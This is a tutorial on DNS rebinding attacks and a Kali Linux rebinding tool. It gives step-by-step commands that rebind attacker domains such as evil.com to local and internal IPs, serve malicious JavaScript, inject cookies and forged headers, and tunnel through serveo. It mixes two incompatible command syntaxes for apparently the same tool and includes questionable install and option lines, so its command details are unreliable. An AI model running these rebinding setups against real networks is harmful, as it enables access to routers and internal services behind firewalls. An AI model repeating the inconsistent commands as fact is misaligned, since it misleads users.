What is DNS Rebinding?
DNS rebinding is a network attack technique that circumvents the same-origin policy in web browsers by rapidly changing the IP address associated with a domain name. The DNS-rebind tool in Kali Linux is designed to help security professionals test for DNS rebinding vulnerabilities in web applications and networks.
How DNS Rebinding Works
- Initial Resolution: The victim’s browser resolves a malicious domain to an attacker-controlled IP address
- Session Establishment: The browser connects to this IP, establishing a same-origin context
- DNS Record Change: The attacker changes the DNS record to point to a target IP (often localhost or internal network)
- Bypass Protection: The browser continues to trust the domain despite the IP change, allowing access to internal services
Installation
The DNS-rebind tool is typically included in Kali Linux by default. If not present, you can install it:
Bash
sudo apt update
sudo apt install dnsrebindAlternatively, you can use other DNS rebinding tools like rebind or sing:
Bash
sudo apt install rebind singBasic Usage
Simple DNS Rebinding Server
Bash
dnsrebind --interface eth0 --domain malicious.example.com --targets 127.0.0.1,192.168.1.1This sets up a DNS server that alternates between returning your server’s IP and the target IPs when queried for malicious.example.com.
Advanced Usage
Custom TTL and Rotation
Bash
dnsrebind --interface eth0 --domain test.example.com --targets 192.168.1.1,192.168.1.2 --ttl 1 --rotation-interval 5--ttl 1: Sets DNS TTL to 1 second (makes rebinding faster)--rotation-interval 5: Rotates between IPs every 5 seconds
Using with Web Server
Bash
dnsrebind --interface eth0 --domain evil.com --targets 127.0.0.1 --http-port 80 --http-response ""This serves malicious JavaScript when the domain first resolves to your server.
Command-Line Options
| Option | Description |
|---|---|
-i | Network interface to bind to (e.g., eth0, wlan0) |
-d | Your registered domain name (e.g., attacker.com) |
-u | Basic Authentication username (default: admin) |
-a | Basic Authentication password (default: admin) |
-r | Initial URL path (default: /) |
-t | Comma-separated list of target IPs (default: client’s IP) |
-n | Callback interval in milliseconds (default: 2000 / 2 sec) |
-p | Target port (default: 80) |
-c | Callback port (default: 81) |
-C | Set a cookie for the client (e.g., sessionid=1234) |
-H | File containing HTTP headers to send to the target |
How It Works
- DNS Rebinding Setup
- The tool runs a DNS server that alternates between:
- The attacker’s IP (initial response)
- The target IP (after rebinding)
- The browser trusts the domain but gets redirected to internal services.
- Exploitation Flow
- Victim visits
attacker.com→ resolves to attacker’s IP. - JavaScript keeps making requests → DNS changes to
internal-ip. - Browser treats it as same-origin → bypasses SOP.
Basic Usage Examples
1. Simple DNS Rebinding Attack
Bash
sudo dns-rebind -i eth0 -d evil.com -t 192.168.1.1,127.0.0.1- Binds to
eth0. - Uses
evil.comfor rebinding. - Alternates between the attacker’s IP and
192.168.1.1(internal) &127.0.0.1(localhost).
2. With Basic Authentication
sudo dns-rebind -i eth0 -d test.com -u admin -a password -t 10.0.0.1- Forces authentication (
admin:password). - Targets
10.0.0.1.
3. Custom Port & Faster Callback
Bash
sudo dns-rebind -i eth0 -d rebind.me -t 192.168.1.1 -p 8080 -n 500- Targets port
8080. - Polls every
500ms(faster rebinding).
Advanced Usage
1. Setting Cookies
Bash
sudo dns-rebind -i eth0 -d hijack.com -C "PHPSESSID=1234" -t 10.10.10.1- Injects a cookie (
PHPSESSID=1234) into requests.
2. Custom HTTP Headers (For SSRF/API Exploits)
Create a file (headers.txt):
Bash
Host: internal-api.local
X-Forwarded-For: 127.0.0.1
Authorization: Bearer xyz123Then run:
Bash
sudo dns-rebind -i eth0 -d api-attack.com -H headers.txt -t 172.16.1.1- Sends custom headers to bypass security checks.
3. Targeting Multiple IPs
Bash
sudo dns-rebind -i eth0 -d multi-rebind.com -t 192.168.1.1,192.168.1.2,10.0.0.1- Rotates between multiple internal IPs.
Real-World Use Cases
- Testing Local Network Services: Access routers, IoT devices, or internal web interfaces that would normally be blocked by same-origin policy
- Bypassing Firewalls: Reach internal services that are firewalled from external access
- Web Application Testing: Test for vulnerabilities in web apps that don’t properly validate host headers
- SSRF Exploitation: Combine with Server-Side Request Forgery vulnerabilities
- Browser Security Research: Study how different browsers handle DNS changes
Troubleshooting Tips
- Permission Issues:
Bash
sudo dnsrebind [...]DNS servers typically need root privileges to bind to port 53.
- Port Conflicts:
Bash
netstat -tulnp | grep 53Stop any existing DNS servers before running dnsrebind.
- Browser Caching:
- Use Chrome with
--dns-prefetch-disableflag - Test in private browsing mode
- Clear DNS cache between tests
- No Response:
- Verify your interface is correct with
ifconfig - Check firewall rules (
sudo ufw status)
- TTL Issues:
- Lower TTL values make attacks more reliable
- Some ISPs ignore very low TTLs
- Debugging:
Use--verboseflag and monitor with:
Bash
sudo tcpdump -i eth0 udp port 53Advanced Techniques
Combining with Other Tools
Use with ngrok or serveo for external testing:
Bash
ssh -R 80:localhost:80 serveo.net
dnsrebind --domain rebind.serveo.net --targets 127.0.0.1Custom Web Server Payloads
Create an HTML file with malicious JavaScript, then:
Bash
dnsrebind --domain evil.com --targets 192.168.1.1 --http-port 80 --http-response $(cat payload.html)
